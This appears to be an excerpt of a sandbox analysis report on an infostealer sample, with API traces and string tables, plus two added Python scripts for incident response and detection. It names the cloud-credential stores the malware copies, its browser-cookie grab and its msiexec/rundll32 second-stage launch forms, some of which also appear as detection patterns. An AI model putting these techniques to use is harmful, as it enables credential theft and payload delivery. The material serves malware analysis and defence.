                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 538459ae6dd1494c6006ee7b7445f36d34cf0188c0844819d18513f470b62fb5
                                      • Instruction ID: b56021ed8845046fc625ac53ea4448328f8c7ba6b91da2e8122b26df029e03b5
                                      • Opcode Fuzzy Hash: 538459ae6dd1494c6006ee7b7445f36d34cf0188c0844819d18513f470b62fb5
                                      • Instruction Fuzzy Hash: 608131719111289BDB28DB90DD91FEAB7B9BF44310F1085D8F109A6180DF74AB85DFE0
                                      APIs
                                        • Part of subcall function 00F28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F28F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F25000
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 00F2501D
                                        • Part of subcall function 00F24B60: wsprintfA.USER32 ref: 00F24B7C
                                        • Part of subcall function 00F24B60: FindFirstFileA.KERNEL32(?,?), ref: 00F24B93
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F2508C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00F250A9
                                        • Part of subcall function 00F24B60: StrCmpCA.SHLWAPI(?,00F30FC4), ref: 00F24BC1
                                        • Part of subcall function 00F24B60: StrCmpCA.SHLWAPI(?,00F30FC8), ref: 00F24BD7
                                        • Part of subcall function 00F24B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00F24DCD
                                        • Part of subcall function 00F24B60: FindClose.KERNEL32(000000FF), ref: 00F24DE2
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F25118
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00F25135
                                        • Part of subcall function 00F24B60: wsprintfA.USER32 ref: 00F24C00
                                        • Part of subcall function 00F24B60: StrCmpCA.SHLWAPI(?,00F308D3), ref: 00F24C15
                                        • Part of subcall function 00F24B60: wsprintfA.USER32 ref: 00F24C32
                                        • Part of subcall function 00F24B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00F24C6E
                                        • Part of subcall function 00F24B60: lstrcat.KERNEL32(?,01D8E9C8), ref: 00F24C9A
                                        • Part of subcall function 00F24B60: lstrcat.KERNEL32(?,00F30FE0), ref: 00F24CAC
                                        • Part of subcall function 00F24B60: lstrcat.KERNEL32(?,?), ref: 00F24CC0
                                        • Part of subcall function 00F24B60: lstrcat.KERNEL32(?,00F30FE4), ref: 00F24CD2
                                        • Part of subcall function 00F24B60: lstrcat.KERNEL32(?,?), ref: 00F24CE6
                                        • Part of subcall function 00F24B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00F24CFC
                                        • Part of subcall function 00F24B60: DeleteFileA.KERNEL32(?), ref: 00F24D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: 037a7db19c9905613af67862880ec570ec03c1f098a13ddf9084d1e68575d0d8
                                      • Instruction ID: 7f0567e0f698108aff87a66cddc68e93d85ea4d8aed3c17b1c92570d5334832f
                                      • Opcode Fuzzy Hash: 037a7db19c9905613af67862880ec570ec03c1f098a13ddf9084d1e68575d0d8
                                      • Instruction Fuzzy Hash: A141D6BAA4021867EB24F7B0EC57FED73286B64704F404454B649660C1EFF8A7C89B93
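The function above walks the cloud-credential stores named in its string table (".aws", ".azure", ".IdentityService", "msal.cache") with a FindFirstFileA/FindNextFileA "*.*" loop and CopyFileA. The script below is an added example for responders, not code from the sample or from Joe Sandbox: it reproduces that walk read-only so the files a victim host actually exposed, and therefore the access keys, refresh tokens and token caches to revoke, can be listed. The base directory the sample prepends is not visible in this block, so it is a parameter; the profile laid out by build_constructed_profile() is constructed, not captured.

```python
"""Enumerate the cloud-credential stores this function walks.

Added example, not code from the sample or from Joe Sandbox. It mirrors the
FindFirstFileA/FindNextFileA "*.*" walk over the directory names in the
function's string table so a responder can see which files were exposed.
"""
from __future__ import annotations

import os
import tempfile
from pathlib import Path

# Names from the function's string table.
TARGET_DIRS = (".aws", ".azure", ".IdentityService")
TARGET_FILE = "msal.cache"


def enumerate_exposed_credential_files(profile_dir: Path) -> dict[str, list[str]]:
    """Return profile-relative paths, grouped by store, of every file the
    stealer's recursive "*.*" walk would have copied."""
    exposed: dict[str, list[str]] = {name: [] for name in TARGET_DIRS}
    exposed["msal_token_cache"] = []
    for name in TARGET_DIRS:
        root = profile_dir / name
        if not root.is_dir():
            continue
        # FindFirstFileA("*.*") with descent into subfolders is os.walk().
        for dirpath, _dirnames, filenames in os.walk(root):
            for filename in sorted(filenames):
                rel = Path(dirpath, filename).relative_to(profile_dir).as_posix()
                exposed[name].append(rel)
                if filename.lower() == TARGET_FILE:
                    exposed["msal_token_cache"].append(rel)
    return exposed


def build_constructed_profile(root: Path) -> None:
    """Lay out a constructed (not captured) profile: three stores the sample
    targets and one directory it ignores. Contents are placeholders."""
    (root / ".aws").mkdir()
    (root / ".aws" / "credentials").write_text("[default]\naws_access_key_id = AKIAEXAMPLE\n")
    (root / ".azure").mkdir()
    (root / ".azure" / "azureProfile.json").write_text("{}")
    (root / ".IdentityService").mkdir()
    (root / ".IdentityService" / "msal.cache").write_bytes(b"\x00")
    (root / "Documents").mkdir()
    (root / "Documents" / "notes.txt").write_text("not a credential store\n")


def demo() -> dict[str, list[str]]:
    """Run the walk against the constructed profile in a temp directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_constructed_profile(root)
        return enumerate_exposed_credential_files(root)


if __name__ == "__main__":
    for store, files in demo().items():
        print(f"{store}: {files}")
```

On a real host, call enumerate_exposed_credential_files() with the user's profile directory (and, for .IdentityService, the LOCALAPPDATA directory where MSAL keeps msal.cache); every file it returns should be treated as copied by the stealer and the corresponding credential rotated.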
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F291FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: fed44fc2c0b857d79cc0473abf7b69bfcc912e5d3c7139ce1cf944948957b7ef
                                      • Instruction ID: ed0f7affbb07d204c071226106b669d0270f768bcaea5b1b413b7561b79df30e
                                      • Opcode Fuzzy Hash: fed44fc2c0b857d79cc0473abf7b69bfcc912e5d3c7139ce1cf944948957b7ef
                                      • Instruction Fuzzy Hash: B271D075910218ABDB14DFE4EC85FEEB7B9BF48700F108518F615AB184DB74E944DB60
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00F23415
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00F235AD
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00F2373A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: 9173a57231aecec6f219756feef9c1f45c7bcb545cac297a5639eb9b781bd991
                                      • Instruction ID: 5a52098498e1b5b3392a3180043996dc3a38fe2e4e4ae045c9d346ae004cacae
                                      • Opcode Fuzzy Hash: 9173a57231aecec6f219756feef9c1f45c7bcb545cac297a5639eb9b781bd991
                                      • Instruction Fuzzy Hash: 2D123E719101289BCB19EBA0EDA2FEDB739BF54300F404599F40676192EF386B49DF62
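The three ShellExecuteEx calls above, together with the string table, show the sample's second-stage loader: it runs C:\Windows\system32\msiexec.exe with /i "<path>.msi" /passive, or C:\Windows\system32\rundll32.exe with a <path>.dll. The rule below is an added detection example, not code from the sample or from Joe Sandbox. It matches those two launch forms in process-creation records and alerts only when the payload sits in a user-writable location, which is where a stealer drops what it downloads; that location heuristic and the "Image|CommandLine|ParentImage" record layout are assumptions, and the log lines are constructed, not captured.

```python
r"""Flag the loader command lines this function hands to ShellExecuteEx.

Added example, not code from the sample or from Joe Sandbox. Launch forms
are taken from the function's string table:
  C:\Windows\system32\msiexec.exe /i "<path>.msi" /passive
  C:\Windows\system32\rundll32.exe <path>.dll
"""
from __future__ import annotations

import re

MSIEXEC_RE = re.compile(r'(?i)msiexec\.exe"?\s+/i\s+"?(?P<path>[^"]+?\.msi)"?(?P<rest>.*)')
RUNDLL32_RE = re.compile(r'(?i)rundll32\.exe"?\s+"?(?P<path>[^"]+?\.dll)"?')
# Assumed user-writable roots; a downloaded second stage lands in one of these.
USER_WRITABLE_RE = re.compile(
    r'(?i)\\(Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)|ProgramData|Temp)\\'
)


def classify_loader_cmdline(cmdline: str) -> dict | None:
    """Return {"technique", "payload", "passive", "user_writable"} for a
    command line in either launch form, else None."""
    m = MSIEXEC_RE.search(cmdline)
    if m:
        return {
            "technique": "msiexec",
            "payload": m.group("path"),
            "passive": "/passive" in m.group("rest").lower(),
            "user_writable": bool(USER_WRITABLE_RE.search(m.group("path"))),
        }
    m = RUNDLL32_RE.search(cmdline)
    if m:
        return {
            "technique": "rundll32",
            "payload": m.group("path"),
            "passive": False,
            "user_writable": bool(USER_WRITABLE_RE.search(m.group("path"))),
        }
    return None


def scan_process_log(lines: list[str]) -> list[dict]:
    """Alert on loader launches whose payload sits under a user-writable path.
    Each record is Image|CommandLine|ParentImage (an assumed layout)."""
    alerts: list[dict] = []
    for line in lines:
        _image, cmdline, parent = line.split("|", 2)
        hit = classify_loader_cmdline(cmdline)
        if hit and hit["user_writable"]:
            hit["parent"] = parent
            alerts.append(hit)
    return alerts


# Constructed records, not captured telemetry. Two model the sample's
# loader; the other three are benign uses of the same binaries.
SAMPLE_LOG = [
    r'C:\Windows\system32\msiexec.exe|"C:\Windows\system32\msiexec.exe" /i "C:\Users\victim\AppData\Local\Temp\kq7.msi" /passive|C:\Users\victim\Downloads\file.exe',
    r'C:\Windows\system32\rundll32.exe|"C:\Windows\system32\rundll32.exe" C:\ProgramData\jd3.dll,Main|C:\Users\victim\Downloads\file.exe',
    r'C:\Windows\system32\msiexec.exe|"C:\Windows\system32\msiexec.exe" /i "C:\Program Files\Vendor\setup.msi" /qn|C:\Windows\explorer.exe',
    r'C:\Windows\system32\rundll32.exe|"C:\Windows\system32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL|C:\Windows\explorer.exe',
    r'C:\Windows\system32\notepad.exe|notepad.exe readme.txt|C:\Windows\explorer.exe',
]

if __name__ == "__main__":
    for alert in scan_process_log(SAMPLE_LOG):
        print(alert)
```

The parent image is carried into the alert because, for this sample, the parent of msiexec.exe or rundll32.exe is the stealer itself; joining on it is how an analyst ties the loader launch back to the first-stage process in telemetry.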
                                      APIs
                                        • Part of subcall function 00F19A50: InternetOpenA.WININET(00F30AF6,00000001,00000000,00000000,00000000), ref: 00F19A6A
                                      • lstrcat.KERNEL32(?,cookies), ref: 00F19CAF
                                      • lstrcat.KERNEL32(?,00F312C4), ref: 00F19CC1
                                      • lstrcat.KERNEL32(?,?), ref: 00F19CD5
                                      • lstrcat.KERNEL32(?,00F312C8), ref: 00F19CE7
                                      • lstrcat.KERNEL32(?,?), ref: 00F19CFB
                                      • lstrcat.KERNEL32(?,.txt), ref: 00F19D0D
                                      • lstrlen.KERNEL32(00000000), ref: 00F19D17
                                      • lstrlen.KERNEL32(00000000), ref: 00F19D26
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                      • API String ID: 3174675846-3542011879
                                      • Opcode ID: 44f2c2f57f4635f9e61b4e5db1f4646baa8c806ee517a90c73bc5263a551578c
                                      • Instruction ID: 1f3e80ce375838b0e857614e570c37fe7c2e2536c5a52aa236dc9cd7b366485a
                                      • Opcode Fuzzy Hash: 44f2c2f57f4635f9e61b4e5db1f4646baa8c806ee517a90c73bc5263a551578c
                                      • Instruction Fuzzy Hash: 07517F72910618ABDB14EBE0EC55FEE7778BF04301F404558F206A7085EF74AA89DFA2
                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F162D0: InternetOpenA.WININET(00F30DFF,00000001,00000000,00000000,00000000), ref: 00F16331
                                        • Part of subcall function 00F162D0: StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F16353
                                        • Part of subcall function 00F162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F16385
                                        • Part of subcall function 00F162D0: HttpOpenRequestA.WININET(00000000,GET,?,01D8E3C8,00000000,00000000,00400100,00000000), ref: 00F163D5
                                        • Part of subcall function 00F162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F1640F
                                        • Part of subcall function 00F162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F16421
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F25568
                                      • lstrlen.KERNEL32(00000000), ref: 00F2557F
                                        • Part of subcall function 00F28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F28FE2
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00F255B4
                                      • lstrlen.KERNEL32(00000000), ref: 00F255D3
                                      • lstrlen.KERNEL32(00000000), ref: 00F255FE
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3240024479-1526165396
                                      • Opcode ID: 6947b94d2de8f07cc9d24f3f02f093ef2fdfdd3677eea92fe473374e27a2ea41
                                      • Instruction ID: 2d13c0aac5149bfde2993a8af90cde6346c7a70e668a201000e30081b4ec9500
                                      • Opcode Fuzzy Hash: 6947b94d2de8f07cc9d24f3f02f093ef2fdfdd3677eea92fe473374e27a2ea41
                                      • Instruction Fuzzy Hash: A9513F70910118DBCB18FFA0EDA6BED7779AF50344F504458F9066B191EF38AB44EB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2001356338-0
                                      • Opcode ID: 1cdc4c5e435e60008b46b5dfd4900eeda3e9f5807bd49442a7cf88780a5800ef
                                      • Instruction ID: 4148ddae712885aaafabc58eef837f7579e599aaea3b6c0be1d4c6bc6f88c0fd
                                      • Opcode Fuzzy Hash: 1cdc4c5e435e60008b46b5dfd4900eeda3e9f5807bd49442a7cf88780a5800ef
                                      • Instruction Fuzzy Hash: E8C1A7B59001299BCB18EFA0EC9AFDE73B9BF64304F004599F40967281DB74EA85DF91
                                      APIs
                                        • Part of subcall function 00F28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F28F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F2453C
                                      • lstrcat.KERNEL32(?,01D8E398), ref: 00F2455B
                                      • lstrcat.KERNEL32(?,?), ref: 00F2456F
                                      • lstrcat.KERNEL32(?,01D8D590), ref: 00F24583
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F28F20: GetFileAttributesA.KERNEL32(00000000,?,00F11B94,?,?,00F3577C,?,?,00F30E22), ref: 00F28F2F
                                        • Part of subcall function 00F1A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F1A489
                                        • Part of subcall function 00F1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                        • Part of subcall function 00F1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                        • Part of subcall function 00F1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                        • Part of subcall function 00F1A110: ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                        • Part of subcall function 00F1A110: LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                        • Part of subcall function 00F1A110: CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                        • Part of subcall function 00F29550: GlobalAlloc.KERNEL32(00000000,00F2462D,00F2462D), ref: 00F29563
                                      • StrStrA.SHLWAPI(?,01D8E1E8), ref: 00F24643
                                      • GlobalFree.KERNEL32(?), ref: 00F24762
                                        • Part of subcall function 00F1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A23F
                                        • Part of subcall function 00F1A210: LocalAlloc.KERNEL32(00000040,?,?,?,00F14F3E,00000000,?), ref: 00F1A251
                                        • Part of subcall function 00F1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F14F3E,00000000,00000000), ref: 00F1A27A
                                        • Part of subcall function 00F1A210: LocalFree.KERNEL32(?,?,?,?,00F14F3E,00000000,?), ref: 00F1A28F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F246F3
                                      • StrCmpCA.SHLWAPI(?,00F308D2), ref: 00F24710
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00F24722
                                      • lstrcat.KERNEL32(00000000,?), ref: 00F24735
                                      • lstrcat.KERNEL32(00000000,00F30FA0), ref: 00F24744
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
